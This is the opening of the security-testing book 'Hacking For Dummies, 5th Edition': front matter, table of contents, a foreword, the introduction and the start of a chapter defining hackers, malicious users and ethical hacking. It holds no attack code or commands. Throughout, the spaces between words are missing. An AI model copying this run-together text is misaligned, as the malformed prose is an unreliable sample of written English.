hacking for dummies - kevin beaver

HackingForDummies,®5thEdition

Publishedby:JohnWiley&Sons,Inc.,111RiverStreet,Hoboken,NJ07030-5774,www.wiley.com

Copyright©2016byJohnWiley&Sons,Inc.,Hoboken,NewJersey

PublishedsimultaneouslyinCanada

Nopartofthispublicationmaybereproduced,storedinaretrievalsystemortransmittedinanyformorbyanymeans,electronic,mechanical,photocopying,recording,scanningorotherwise,exceptaspermittedunderSections107or108ofthe1976UnitedStatesCopyrightAct,withoutthepriorwrittenpermissionofthePublisher.RequeststothePublisherforpermissionshouldbeaddressedtothePermissionsDepartment,JohnWiley&Sons,Inc.,111RiverStreet,Hoboken,NJ07030,(201)748-6011,fax(201)748-6008,oronlineathttp://www.wiley.com/go/permissions.

Trademarks:Wiley,ForDummies,theDummiesManlogo,Dummies.com,MakingEverythingEasier,andrelatedtradedressaretrademarksorregisteredtrademarksofJohnWiley&Sons,Inc.andmaynotbeusedwithoutwrittenpermission.Allothertrademarksarethepropertyoftheirrespectiveowners.JohnWiley&Sons,Inc.isnotassociatedwithanyproductorvendormentionedinthisbook.

LIMITOFLIABILITY/DISCLAIMEROFWARRANTY:THEPUBLISHERANDTHEAUTHORMAKENOREPRESENTATIONSORWARRANTIESWITHRESPECTTOTHEACCURACYORCOMPLETENESSOFTHECONTENTSOFTHISWORKANDSPECIFICALLYDISCLAIMALLWARRANTIES,INCLUDINGWITHOUTLIMITATIONWARRANTIESOFFITNESSFORAPARTICULARPURPOSE.NOWARRANTYMAYBECREATEDOREXTENDEDBYSALESORPROMOTIONALMATERIALS.THEADVICEANDSTRATEGIESCONTAINEDHEREINMAYNOTBESUITABLEFOREVERYSITUATION.THISWORKISSOLDWITHTHEUNDERSTANDINGTHATTHEPUBLISHERISNOTENGAGEDINRENDERINGLEGAL,ACCOUNTING,OROTHERPROFESSIONALSERVICES.IFPROFESSIONALASSISTANCEISREQUIRED,THESERVICESOFACOMPETENTPROFESSIONALPERSONSHOULDBESOUGHT.NEITHERTHEPUBLISHERNORTHEAUTHORSHALLBELIABLEFORDAMAGESARISINGHEREFROM.THEFACTTHATANORGANIZATIONORWEBSITEISREFERREDTOINTHISWORKASACITATIONAND/ORAPOTENTIALSOURCEOFFURTHERINFORMATIONDOESNOTMEANTHATTHEAUTHORORTHEPUBLISHERENDORSESTHEINFORMATIONTHEORGANIZATIONORWEBSITEMAYPROVIDEORRECOMMENDATIONSITMAYMAKE.FURTHER,READERSSHOULDBEAWARETHATINTERNETWEBSITESLISTEDINTHISWORKMAYHAVECHANGEDORDISAPPEAREDBETWEENWHENTHISWORKWASWRITTENANDWHENITISREAD.

http://www.wiley.com

http://www.wiley.com/go/permissions

Forgeneralinformationonourotherproductsandservices,pleasecontactourCustomerCareDepartmentwithintheU.S.at877-762-2974,outsidetheU.S.at317-572-3993,orfax317-572-4002.Fortechnicalsupport,pleasevisitwww.wiley.com/techsupport.

Wileypublishesinavarietyofprintandelectronicformatsandbyprint-on-demand.Somematerialincludedwithstandardprintversionsofthisbookmaynotbeincludedine-booksorinprint-on-demand.IfthisbookreferstomediasuchasaCDorDVDthatisnotincludedintheversionyoupurchased,youmaydownloadthismaterialathttp://booksupport.wiley.com.FormoreinformationaboutWileyproducts,visitwww.wiley.com.

LibraryofCongressControlNumber:2015956627

ISBN978-1-119-15468-6(pbk);ISBN978-1-119-15469-3(ebk);ISBN978-1-119-15470-9(ebk)

http://www.wiley.com/techsupport

http://booksupport.wiley.com

http://www.wiley.com

HackingForDummies®Visitwww.dummies.com/cheatsheet/hackingtoviewthisbook’scheatsheet.

TableofContentsCoverForewordIntroduction

WhoShouldReadThisBook?

AboutThisBook

HowtoUseThisBook

WhatYouDon’tNeedtoRead

FoolishAssumptions

HowThisBookIsOrganized

IconsUsedinThisBook

WheretoGofromHere

PartI:BuildingtheFoundationforSecurityTestingChapter1:IntroductiontoEthicalHacking

StraighteningOuttheTerminology

RecognizingHowMaliciousAttackersBegetEthicalHackers

UnderstandingtheNeedtoHackYourOwnSystems

UnderstandingtheDangersYourSystemsFace

ObeyingtheEthicalHackingPrinciples

UsingtheEthicalHackingProcess

Chapter2:CrackingtheHackerMindsetWhatYou’reUpAgainst

WhoBreaksintoComputerSystems

WhyTheyDoIt

PlanningandPerformingAttacks

MaintainingAnonymity

Chapter3:DevelopingYourEthicalHackingPlanEstablishingYourGoals

DeterminingWhichSystemstoHack

CreatingTestingStandards

SelectingSecurityAssessmentTools

Chapter4:HackingMethodology

http://www.dummies.com/cheatsheet/hacking

kindle:embed:0002?mime=image/jpg

kindle:embed:0002?mime=image/jpg

SettingtheStageforTesting

SeeingWhatOthersSee

ScanningSystems

DeterminingWhat’sRunningonOpenPorts

AssessingVulnerabilities

PenetratingtheSystem

PartII:PuttingSecurityTestinginMotionChapter5:InformationGathering

GatheringPublicInformation

MappingtheNetwork

Chapter6:SocialEngineeringIntroducingSocialEngineering

StartingYourSocialEngineeringTests

WhyAttackersUseSocialEngineering

UnderstandingtheImplications

PerformingSocialEngineeringAttacks

SocialEngineeringCountermeasures

Chapter7:PhysicalSecurityIdentifyingBasicPhysicalSecurityVulnerabilities

PinpointingPhysicalVulnerabilitiesinYourOffice

Chapter8:PasswordsUnderstandingPasswordVulnerabilities

CrackingPasswords

GeneralPasswordCrackingCountermeasures

SecuringOperatingSystems

PartIII:HackingNetworkHostsChapter9:NetworkInfrastructureSystems

UnderstandingNetworkInfrastructureVulnerabilities

ChoosingTools

Scanning,Poking,andProddingtheNetwork

DetectingCommonRouter,Switch,andFirewallWeaknesses

PuttingUpGeneralNetworkDefenses

Chapter10:WirelessNetworksUnderstandingtheImplicationsofWirelessNetworkVulnerabilities

ChoosingYourTools

DiscoveringWirelessNetworks

DiscoveringWirelessNetworkAttacksandTakingCountermeasures

Chapter11:MobileDevicesSizingUpMobileVulnerabilities

CrackingLaptopPasswords

CrackingPhonesandTablets

PartIV:HackingOperatingSystemsChapter12:Windows

IntroducingWindowsVulnerabilities

ChoosingTools

GatheringInformationAboutYourWindowsVulnerabilities

DetectingNullSessions

CheckingSharePermissions

ExploitingMissingPatches

RunningAuthenticatedScans

Chapter13:LinuxUnderstandingLinuxVulnerabilities

ChoosingTools

GatheringInformationAboutYourLinuxVulnerabilities

FindingUnneededandUnsecuredServices

Securingthe.rhostsandhosts.equivFiles

AssessingtheSecurityofNFS

CheckingFilePermissions

FindingBufferOverflowVulnerabilities

CheckingPhysicalSecurity

PerformingGeneralSecurityTests

PatchingLinux

PartV:HackingApplicationsChapter14:CommunicationandMessagingSystems

IntroducingMessagingSystemVulnerabilities

RecognizingandCounteringE-MailAttacks

UnderstandingVoiceoverIP

Chapter15:WebApplicationsandMobileAppsChoosingYourWebSecurityTestingTools

SeekingOutWebVulnerabilities

MinimizingWebSecurityRisks

UncoveringMobileAppFlaws

Chapter16:DatabasesandStorageSystemsDivingIntoDatabases

FollowingBestPracticesforMinimizingDatabaseSecurityRisks

OpeningUpAboutStorageSystems

FollowingBestPracticesforMinimizingStorageSecurityRisks

PartVI:SecurityTestingAftermath

Chapter17:ReportingYourResultsPullingtheResultsTogether

PrioritizingVulnerabilities

CreatingReports

Chapter18:PluggingSecurityHolesTurningYourReportsintoAction

PatchingforPerfection

HardeningYourSystems

AssessingYourSecurityInfrastructure

Chapter19:ManagingSecurityProcessesAutomatingtheEthicalHackingProcess

MonitoringMaliciousUse

OutsourcingSecurityAssessments

InstillingaSecurity-AwareMindset

KeepingUpwithOtherSecurityEfforts

PartVII:ThePartofTensChapter20:TenTipsforGettingSecurityBuy-In

CultivateanAllyandaSponsor

Don’tBeaFUDdyDuddy

DemonstrateHowtheOrganizationCan’tAffordtoBeHacked

OutlinetheGeneralBenefitsofSecurityTesting

ShowHowSecurityTestingSpecificallyHelpstheOrganization

GetInvolvedintheBusiness

EstablishYourCredibility

SpeakonManagement’sLevel

ShowValueinYourEfforts

BeFlexibleandAdaptable

Chapter21:TenReasonsHackingIstheOnlyEffectiveWaytoTest

TheBadGuysThinkBadThoughts,UseGoodTools,andDevelopNewMethods

ITGovernanceandComplianceAreMorethanHigh-LevelChecklistAudits

HackingComplementsAuditsandSecurityEvaluations

CustomersandPartnersWillAsk,‘HowSecureAreYourSystems?’

TheLawofAveragesWorksAgainstBusinesses

SecurityAssessmentsImprovetheUnderstandingofBusinessThreats

IfaBreachOccurs,YouHaveSomethingtoFallBackOn

In-DepthTestingBringsOuttheWorstinYourSystems

CombiningtheBestofPenetrationTestingandVulnerabilityAssessmentsIsWhatYouNeed

ProperTestingCanUncoverWeaknessesThatMightGoOverlookedforYears

Chapter22:TenDeadlyMistakesNotGettingPriorApproval

AssumingYouCanFindAllVulnerabilitiesDuringYourTests

AssumingYouCanEliminateAllSecurityVulnerabilities

PerformingTestsOnlyOnce

ThinkingYouKnowItAll

RunningYourTestsWithoutLookingatThingsfromaHacker’sViewpoint

NotTestingtheRightSystems

NotUsingtheRightTools

PoundingProductionSystemsattheWrongTime

OutsourcingTestingandNotStayingInvolved

Appendix:ToolsandResourcesAdvancedMalware

Bluetooth

Certifications

Databases

DenialofServiceProtection

Exploits

GeneralResearchTools

HackerStuff

Keyloggers

LawsandRegulations

Linux

LiveToolkits

LogAnalysis

Messaging

Miscellaneous

Mobile

Networks

PasswordCracking

PatchManagement

SecurityEducationandLearningResources

SecurityMethodsandModels

SocialEngineringandPhishing

SourceCodeAnalysis

Statistics

Storage

SystemHardening

UserAwarenessandTraining

VoiceoverIP

VulnerabilityDatabases

WebsitesandApplications

Windows

WirelessNetworks

AbouttheAuthorCheatSheetConnectwithDummiesEndUserLicenseAgreement

ForewordTherewerenobooksonhackingwhenIbecameapenetrationtesterandsecurityauditorforPricewaterhouseCoopersin1995.Thereweretools,techniques,andprocedures,though.Whilethetoolshavechangeddramatically,thetechniquesandprocedureshavebeenremarkablystable,andKevinBeaverhascreatedtheperfectintroductiontohackingthatincorporatesthebestprocedureswiththelatesttools.Planning,footprintanalysis,scanning,andattackingareallstillrequired.Perhapsthereismoreemphasisonwirelessandwebhackingandlessonthingssuchaswardialingthankstochangesinthewaycompaniesandpeopleareconnected.Therealvaluetoextractfromthisbookisinunderstandingthetoolsandbecomingproficientintheiruse.

Pentesting,orhacking,isthebestwaytogetintotherewardingfieldofITsecurity.Itisopentoanyonewithafoundationincomputing,coding,ornetworking.Ifyoudonothaveabackgroundinallthree,youwillquicklygainknowledgeintheotherdisciplinesbecausehackingtakesyoudownmanypaths.

Therewasatimewhenaprofessionalhackerhadtobeajack-of-all-trades.Nowtherearethousandsofsubspecialtieswithintherealmofhacking:mobileappsecuritytesting,webappsecuritytesting,networkpenetration,andOS-specifichackingforMacOSX,Windows,Linux,andAndroid.Securityresearchers,specialistswhodiscovernewvulnerabilities,arehavingabigimpactontheso-calledInternetofThings(IoT)astheydiscovernewwaystohackmedicaldevices,automobiles,airplanes,andindustrialcontrolsystems,whichmakesthisfieldthatmuchmoreexcitingandrelevant.

Hackingappealstoaspecialkindofperson.Tinkerers,inventors,andjustthosewhoarefascinatedbythewaythingsworkgetintoITsecuritythroughthehackingdoor.

AsKevinexplainsthough,hackingasaprofessionrequiresdisciplineandcarefulrecordkeeping,perhapsthehardestpartforthesometimesbrilliantamateurhackers—theoneswhowillstaygluedtotheirconsolesfor24hours,scriptingattacksandwendingtheirwaythroughanetworkuntiltheyhitgold.

Forme,themostinterestingtypeofhackingiswhatIhavetermedbusinessprocesshacking.Whenformalized,businessprocesshackingisanexampleofwhatKevincallsknowledge-basedhacking.Itisbestperformedwithaninsider’sknowledgeofarchitecturesandtechnologyand,mostimportant,thebusinessprocess.Thisiswhereyoudiscoverflawsinthewayabusinessisbuilt.Isthereathird-partypaymentprocessorintheloopofane-commercesite?Canasubscribertoaninformationresourceabusehisaccessinwaysahackercannot?Wherearethe“trustinterfaces?”Istheonlycontrolatthoseinterfaces:“Wetrusttheuser/system/suppliernottohackus?”

Youseebusinessprocesshackingeveryday.So-calledSearchEngineOptimization(SEO)expertsfigureouthowtohackGoogle’spagerankalgorithmsandcontrols.Ticketstopopularconcertsandsportingeventsaresoldoutinminutestobotsthatscarf

themupforresaleataprofit.Amazonsalesranksarehackedbyauthorswhopurchasetheirownbooksinquantity.

ThisbookisyourintroductiontothechallengingandengagingworldofhackingITsystems.Ipredictthreethings:1.Hackingwillaccelerateyourcareerasyougaininvaluableexperienceandbecomeindispensabletoyourorganization.2.Newdoorswillopenforyou.Youwillfindthatyouhavemanyoptions.Youcanjoin(orform)aconsultingfirm.Youcanmoveuptheranksinsideyourorganization,perhapstobecomingtheChiefInformationSecurityOfficer.Youcanjoinavendorthatdesignsandsellssecuritytoolsinwhichyouhavegainedproficiency.3.Youwillneverstoplearning.Hackingisoneofthefewfieldswhereyouareneverdone.

RichardStiennonChiefResearchAnalyst,IT-HarvestAuthorofThereWillBeCyberwar

IntroductionWelcometoHackingForDummies,5thEdition.Thisbookoutlines—inplainEnglish—computerhackertricksandtechniquesthatyoucanusetoassessthesecurityofyourinformationsystems,findthevulnerabilitiesthatmatter,andfixtheweaknessesbeforecriminalhackersandmaliciousinsiderstakeadvantageofthem.Thishackingistheprofessional,aboveboard,andlegaltypeofsecuritytesting—whichIoftenrefertoasethicalhackingthroughoutthebook.

Computerandnetworksecurityisacomplexsubjectandanever-movingtarget.Youmuststayontopofittoensurethatyourinformationisprotectedfromthebadguys.That’swherethetechniquesandtoolsoutlinedinthisbookcanhelp.

Youcanimplementallthesecuritytechnologiesandotherbestpracticespossible,andyourinformationsystemsmightbesecure—asfarasyouknow.However,untilyouunderstandhowmaliciousattackersthink,applythatknowledge,andusetherighttoolstoassessyoursystemsfromtheirpointofview,it’spracticallyimpossibletohaveatruesenseofhowsecureyourinformationreallyis.

Ethicalhacking,ormoresimply,“securityassessments”—whichencompassesformalandmethodicalpenetrationtesting,whitehathacking,andvulnerabilitytesting—isnecessarytofindsecurityflawsandtohelpvalidatethatyourinformationsystemsaretrulysecureonanongoingbasis.Thisbookprovidesyouwiththeknowledgetoimplementasecurityassessmentprogramsuccessfully,performpropersecuritychecks,andputthepropercountermeasuresinplacetokeepexternalhackersandmalicioususersincheck.

WhoShouldReadThisBook?

Disclaimer:Ifyouchoosetousetheinformationinthisbooktohackorbreakintocomputersystemsmaliciouslyandwithoutauthorization,you’reonyourown.NeitherI(theauthor)noranyoneelseassociatedwiththisbookshallbeliableorresponsibleforanyunethicalorcriminalchoicesthatyoumightmakeandexecuteusingthemethodologiesandtoolsthatIdescribe.Thisbookisintendedsolelyforinformationtechnology(IT)andinformationsecurityprofessionalstotestinformationsecurity—eitheronyourownsystemsoronaclient’ssystems—inanauthorizedfashion.

Okay,nowthatthat’soutoftheway,it’stimeforthegoodstuff!Thisbookisforyouifyou’reanetworkadministrator,informationsecuritymanager,securityconsultant,securityauditor,compliancemanager,orotherwiseinterestedinfindingoutmoreabouttestingcomputersystemsandIToperationstomakethingsmoresecure.

Asthepersonperformingwell-intendedinformationsecurityassessments,youcandetectandpointoutsecurityholesthatmightotherwisebeoverlooked.Ifyou’reperformingthesetestsonyoursystems,theinformationyouuncoverinyourtestscanhelpyouwinovermanagementandprovethatinformationsecurityreallyisabusinessissuetobetakenseriously.Likewise,ifyou’reperformingthesetestsforyourclients,youcanhelpfindsecurityholesthatcanbepluggedbeforethebadguyshaveachancetoexploitthem.

Theinformationinthisbookhelpsyoustayontopofthesecuritygameandenjoythefameandgloryofhelpingyourorganizationandclientspreventbadthingsfromhappeningtotheirinformationandnetworkenvironment.

AboutThisBookHackingForDummies,5thEdition,isareferenceguideonhackingyoursystemstoimprovesecurityandhelpminimizebusinessrisks.Thesecuritytestingtechniquesarebasedonwrittenandunwrittenrulesofcomputersystempenetrationtesting,vulnerabilitytesting,andinformationsecuritybestpractices.Thisbookcoverseverythingfromestablishingyourhackingplantotestingyoursystemstopluggingtheholesandmanaginganongoingsecuritytestingprogram.Realistically,formanynetworks,operatingsystems,andapplications,thousandsofpossiblehacksexist.Idon’tcoverthemallbutIdocoverthemajoronesonvariousplatformsandsystemsthatIbelievecontributetothemostsecurityproblemsinbusinesstoday.Whetheryouneedtoassesssecurityvulnerabilitiesonasmallhomeofficenetwork,amedium-sizedcorporatenetwork,oracrosslargeenterprisesystems,HackingForDummies,5thEdition,providestheinformationyouneed.

HowtoUseThisBookThisbookincludesthefollowingfeatures:

VarioustechnicalandnontechnicaltestsandtheirdetailedmethodologiesSpecificcountermeasurestoprotectagainsthacking

Beforeyoustarttestingyoursystems,familiarizeyourselfwiththeinformationinPartIsoyou’repreparedforthetasksathand.Theadage“ifyoufailtoplan,youplantofail”ringstruefortheethicalhackingprocess.Youmusthaveasolidgameplaninplaceifyou’regoingtobesuccessful.

WhatYouDon’tNeedtoReadDependingonyourcomputerandnetworkconfigurations,youmaybeabletoskipchapters.Forexample,ifyouaren’trunningLinuxorwirelessnetworks,youcanskipthosechapters.Justbecareful.Youmaythinkyou’renotrunningcertainsystems,buttheycouldverywellbeonyournetwork,somewhere,waitingtobeexploited.

FoolishAssumptionsImakeafewassumptionsaboutyou,theaspiringITorsecurityprofessional:

Youarefamiliarwithbasiccomputer-,network-,andinformation-securityconceptsandterms.Youhaveaccesstoacomputerandanetworkonwhichtousethesetechniquesandtools.Youhavepermissiontoperformthehackingtechniquesdescribedinthisbook.

HowThisBookIsOrganizedThisbookisorganizedintosevenmodularparts,soyoucanjumparoundfromoneparttoanotherasneeded.Eachchapterprovidespracticalmethodologiesandpracticesyoucanuseaspartofyoursecuritytestingefforts,includingchecklistsandreferencestospecifictoolsyoucanuse,aswellasresourcesontheInternet.

PartI:BuildingtheFoundationforSecurityTestingThispartcoversthefundamentalaspectsofsecurityassessments.Itstartswithanoverviewofthevalueofethicalhackingandwhatyoushouldandshouldn’tdoduringtheprocess.Yougetinsidethemaliciousmindsetanddiscoverhowtoplanyoursecuritytestingefforts.Thispartcoversthestepsinvolvedintheethicalhackingprocess,includinghowtochoosethepropertools.

PartII:PuttingSecurityTestinginMotionThispartgetsyourollingwiththesecuritytestingprocess.Itcoversseveralwell-knownandwidelyusedhackattacks,includinginformationgathering,socialengineering,andcrackingpasswords,togetyourfeetwet.Thispartcoversthehumanandphysicalelementsofsecurity,whichtendtobetheweakestlinksinanyinformationsecurityprogram.Afteryouplungeintothesetopics,you’llknowthetipsandtricksrequiredtoperformcommongeneralsecuritytestsagainstyoursystems,aswellasspecificcountermeasurestokeepyourinformationsystemssecure.

PartIII:HackingNetworkHostsStartingwiththelargernetworkinmind,thispartcoversmethodstotestyoursystemsforvariouswell-knownnetworkinfrastructurevulnerabilities.FromweaknessesintheTCP/IPprotocolsuitetowirelessnetworkinsecurities,youfindouthownetworksarecompromisedbyusingspecificmethodsofflawednetworkcommunications,alongwithvariouscountermeasuresthatyoucanimplementtoavoidbecomingavictim.Ithendelvedownintomobiledevicesandshowhowsmartphones,tablets,andthelikecanbeexploited.

PartIV:HackingOperatingSystemsPracticallyalloperatingsystemshavewell-knownvulnerabilitiesthathackersoftenexploit.Thispartjumpsintohackingthewidely-usedoperatingsystems:WindowsandLinux.Thehackingmethodsincludescanningyouroperatingsystemsforvulnerabilitiesandenumeratingthespecifichoststogaindetailedinformation.Thispartalsoincludesinformationonexploitingwell-knownvulnerabilitiesintheseoperatingsystems,takingoveroperatingsystemsremotely,andspecificcountermeasuresthatyoucanimplementtomakeyouroperatingsystemsmoresecure.

PartV:HackingApplicationsApplicationsecurityisacriticalareaoffocusthesedays.Anincreasingnumberofattacks—whichareoftenabletobypassfirewalls,intrusionpreventionsystems,andantivirussoftware—areaimeddirectlyatweb,mobile,andrelatedapplications.Thispartdiscusseshackingspecificbusinessapplications,includingcoverageofmessagingsystems,webapplications,mobileapps,anddatabases,alongwithpracticalcountermeasuresthatyoucanputinplacetomakeyoursystemsmoresecure.

PartVI:SecurityTestingAftermathAfteryouperformyoursecuritytesting,whatdoyoudowiththeinformationyougather?Shelveit?Showitoff?Howdoyoumoveforward?Thispartanswersthesequestionsandmore.Fromdevelopingreportsformanagementtoremediatingthesecurityflawsthatyoudiscovertoestablishingproceduresforyourongoingvulnerabilitytestingefforts,thispartbringsthesecurityassessmentprocessfullcircle.Thisinformationnotonlyensuresthatyoureffortandtimearewellspent,butalsoisevidencethatinformationsecurityisanessentialelementforsuccessinanybusinessthatdependsoncomputersandinformationtechnology.

PartVII:ThePartofTensThispartcontainstipstohelpensurethesuccessofyourinformationsecurityprogram.Youfindouthowtogetmanagementtobuyintoyourprogramsoyoucangetgoingandstartprotectingyoursystems.Thispartalsoincludesthetoptenethicalhackingmistakesyouabsolutelymustavoid.

Theappendix,whichalsoappearsinthispart,providesaone-stopreferencelistingofethicalhackingtoolsandresources.

IconsUsedinThisBook

Thisiconpointsoutinformationthatisworthcommittingtomemory.

Thisiconpointsoutinformationthatcouldhaveanegativeimpactonyourethicalhackingefforts—sopleasereadit!

Thisiconreferstoadvicethatcanhelphighlightorclarifyanimportantpoint.

Thisiconpointsouttechnicalinformationthatisinterestingbutnotvitaltoyourunderstandingofthetopicbeingdiscussed.

WheretoGofromHereThemoreyouknowabouthowexternalhackersandrogueinsidersworkandhowyoursystemsshouldbetested,thebetteryou’reabletosecureyourcomputerandnetworksystems.Thisbookprovidesthefoundationthatyouneedtodevelopandmaintainasuccessfulsecurityassessmentprograminordertominimizebusinessrisks.

Keepinmindthatthehigh-levelconceptsofsecuritytestingwon’tchangeasoftenasthespecificvulnerabilitiesyouprotectagainst.Ethicalhackingwillalwaysremainbothanartandascienceinafieldthat’sever-changing.Youmustkeepupwiththelatesthardwareandsoftwaretechnologies,alongwiththevariousvulnerabilitiesthatcomeaboutmonthaftermonthandyearafteryear.

Youwon’tfindasinglebestwaytohackyoursystems,sotweakthisinformationtoyourheart’scontentand,asI’vealwayssaid,happyhacking!

BuildingtheFoundationforSecurityTesting

ForDummiescanhelpyougetstartedwithlotsofsubjects.Visitwww.dummies.comforgreatDummiescontentonline.

http://www.dummies.com

Inthispart…Yourmissionistofindtheholesinyournetworksoyoucanfixthembeforethebadguysexploitthem.It’sthatsimple.Thismissionwillbefun,educational,andmostlikelyentertaining.Itwillcertainlybeaneye-openingexperience.Thecoolpartisthatyoucanemergeasthehero,knowingthatyourorganizationwillbebetterprotectedagainstmalicioushackersandinsiderattacksandlesslikelytoexperienceabreachandhaveitsnamesmearedacrosstheheadlines.

Ifyou’renewtosecuritytesting,thisistheplacetobegin.Thechaptersinthispartgetyoustartedwithinformationonwhattodoandhowtodoitwhenyou’rehackingyourownsystems.Oh,andyoufindoutwhatnottodoaswell.Thisinformationwillguideyouthroughbuildingthefoundationforyoursecuritytestingprogram.Thisfoundationwillkeepyouontherightpathandoffanyone-waydead-endstreets.Thismissionisindeedpossible—youjusthavetogetyourducksinarowfirst.

Chapter1

IntroductiontoEthicalHackingInThisChapter

Understandinghackers’andmalicioususers’objectives

Examininghowtheethicalhackingprocesscameabout

Understandingthedangersyourcomputersystemsface

Startingtousetheethicalhackingprocessforsecuritytesting

Thisbookisabouttestingyourcomputersandnetworksforsecurityvulnerabilitiesandpluggingtheholesyoufindbeforethebadguysgetachancetoexploitthem.

StraighteningOuttheTerminologyMostpeoplehaveheardofhackersandmalicioususers.Manyhaveevensufferedtheconsequencesoftheircriminalactions.Sowhoarethesepeople?Andwhydoyouneedtoknowaboutthem?Thenextfewsectionsgiveyouthelowdownontheseattackers.

Inthisbook,Iusethefollowingterminology:

Hackers(orexternalattackers)trytocompromisecomputers,sensitiveinformation,andevenentirenetworksforill-gottengains—usuallyfromtheoutside—asunauthorizedusers.Hackersgoforalmostanysystemtheythinktheycancompromise.Somepreferprestigious,well-protectedsystems,buthackingintoanyone’ssystemincreasesanattacker’sstatusinhackercircles.

Malicioususers(orinternalattackers)trytocompromisecomputersandsensitiveinformationfromtheinsideasauthorizedand“trusted”users.Malicioususersgoforsystemstheybelievetheycancompromiseforill-gottengainsorrevenge.

Maliciousattackersare,generallyspeaking,bothhackersandmalicioususers.Forthesakeofsimplicity,IrefertobothashackersandspecifyhackerormalicioususeronlywhenIneedtodifferentiateanddrilldownfurtherintotheiruniquetools,techniques,andwaysofthinking.

Ethicalhackers(orgoodguys)hacksystemstodiscovervulnerabilitiestoprotectagainstunauthorizedaccess,abuse,andmisuse.Informationsecurityresearchers,consultants,andinternalstafffallintothiscategory.

DefininghackerHackerhastwomeanings:

Traditionally,hackersliketotinkerwithsoftwareorelectronicsystems.Hackersenjoyexploringandlearninghowcomputersystemsoperate.Theylovediscoveringnewwaystowork—bothmechanicallyandelectronically.Inrecentyears,hackerhastakenonanewmeaning—someonewhomaliciouslybreaksintosystemsforpersonalgain.Technically,thesecriminalsarecrackers(criminalhackers).Crackersbreakinto,orcrack,systemswithmaliciousintent.Thegaintheyseekcouldbefame,intellectualproperty,profit,orevenrevenge.Theymodify,delete,andstealcriticalinformationaswellastakeentirenetworksoffline,oftenbringinglargecorporationsandgovernmentagenciestotheirknees.

Thegood-guy(whitehat)hackersdon’tlikebeinglumpedinthesamecategoryasthebad-guy(blackhat)hackers.(Incaseyou’recurious,thewhitehatandblackhattermscomefromoldWesternTVshowsinwhichthegoodguysworewhitecowboyhatsandthebadguysworeblackcowboyhats.)Grayhathackersarealittlebitofboth.

Whateverthecase,mostpeoplehaveanegativeconnotationofthewordhacker.

Manymalicioushackersclaimthattheydon’tcausedamagebutinsteadhelpothersforthe“greatergood”ofsociety.Yeah,right.Malicioushackersareelectronicmiscreantsanddeservetheconsequencesoftheiractions.

Becarefulnottoconfusecriminalhackerswithsecurityresearchers.Researchersnotonlyhackaboveboardanddeveloptheamazingtoolsthatwegettouseinourwork,butalsothey(usually)takeresponsiblestepstodisclosetheirfindingsandpublishtheircode.

DefiningmalicioususerMalicioususer—meaningarogueemployee,contractor,intern,orotheruserwhoabuseshisorhertrustedprivileges—isacommonterminsecuritycirclesandinheadlinesaboutinformationbreaches.Theissueisn’tnecessarilyusers“hacking”internalsystems,butratheruserswhoabusethecomputeraccessprivilegesthey’vebeengiven.Usersferretthroughcriticaldatabasesystemstogleansensitiveinformation,e-mailconfidentialclientinformationtothecompetitionorelsewheretothecloud,ordeletesensitivefilesfromserversthattheyprobablydidn’tneedtohaveaccesstointhefirstplace.There’salsotheoccasionalignorantinsiderwhoseintentisnotmaliciousbutwhostillcausessecurityproblemsbymoving,deleting,orcorruptingsensitiveinformation.Evenaninnocent“fat-finger”onthekeyboardcanhavedireconsequencesinthebusinessworld.

MalicioususersareoftentheworstenemiesofITandinformationsecurityprofessionalsbecausetheyknowexactlywheretogotogetthegoodsanddon’tneedtobecomputersavvytocompromisesensitiveinformation.Theseusershavetheaccesstheyneedandthemanagementtruststhem—oftenwithoutquestion.

So,whataboutthatEdwardSnowdenguy—theformerNationalSecurityAgencyemployeewhorattedouthisownemployer?That’sacomplicatedsubjectandItalkabouthackermotivationsinChapter2.RegardlessofwhatyouthinkofSnowden,heabusedhisauthorityandviolatedthetermsofhisnon-disclosureagreement.

RecognizingHowMaliciousAttackersBegetEthicalHackers

Youneedprotectionfromhackershenanigans;youhavetobecomeassavvyastheguystryingtoattackyoursystems.Atruesecurityassessmentprofessionalpossessestheskills,mindset,andtoolsofahackerbutisalsotrustworthy.Heorsheperformsthehacksassecuritytestsagainstsystemsbasedonhowhackersmightwork.

Ethicalhacking—whichencompassesformalandmethodicalpenetrationtesting,whitehathacking,andvulnerabilitytesting—involvesthesametools,tricks,andtechniquesthatcriminalhackersuse,butwithonemajordifference:Ethicalhackingisperformedwiththetarget’spermissioninaprofessionalsetting.Theintentofethicalhackingistodiscovervulnerabilitiesfromamaliciousattacker’sviewpointtobettersecuresystems.Ethicalhackingispartofanoverallinformationriskmanagementprogramthatallowsforongoingsecurityimprovements.Ethicalhackingcanalsoensurethatvendors’claimsaboutthesecurityoftheirproductsarelegitimate.

Ifyouperformethicalhackingtestsandwanttoaddanothercertificationtoyourcredentials,youmightwanttoconsiderbecomingaCertifiedEthicalHacker(C|EH)throughacertificationprogramsponsoredbyEC-Council.Seewww.eccouncil.orgformoreinformation.LiketheCertifiedInformationSystemsSecurityProfessional(CISSP),theC|EHcertificationhasbecomeawell-knownandrespectedcertificationintheindustry.It’sevenaccreditedbytheAmericanNationalStandardsInstitute(ANSI17024).OtheroptionsincludetheSANSGlobalInformationAssuranceCertification(GIAC)programandtheOffensiveSecurityCertifiedProfessional(OSCP)program—acompletelyhands-onsecuritytestingcertification.Ilovethatapproachasalltoooften,peopleperformingthistypeofworkdon’thavetheproperhands-onexperiencetodoitwell.Seewww.giac.organdwww.offensive-security.comformoreinformation.

EthicalhackingversusauditingManypeopleconfusesecuritytestingviatheethicalhackingapproachwithsecurityauditing,buttherearebigdifferences,namelyintheobjectives.Securityauditinginvolvescomparingacompany’ssecuritypolicies(orcompliancerequirements)towhat’sactuallytakingplace.Theintentofsecurityauditingistovalidatethatsecuritycontrolsexist—typicallyusingarisk-basedapproach.Auditingofteninvolvesreviewingbusinessprocessesand,inmanycases,mightnotbeverytechnical.Ioftenrefertosecurityauditsassecuritychecklistsbecausethey’reusuallybasedon(youguessedit)checklists.

http://www.eccouncil.org/

http://www.giac.org

https://www.offensive-security.com

Notallauditsarehigh-level,butmanyoftheonesI’veseen(especiallyaroundPCIDSS[PaymentCardIndustryDataSecurityStandard]compliance)arequitesimplistic—oftenperformedbypeoplewhohavenotechnicalcomputer,network,andapplicationexperienceor,worse,theyworkoutsideofITaltogether!

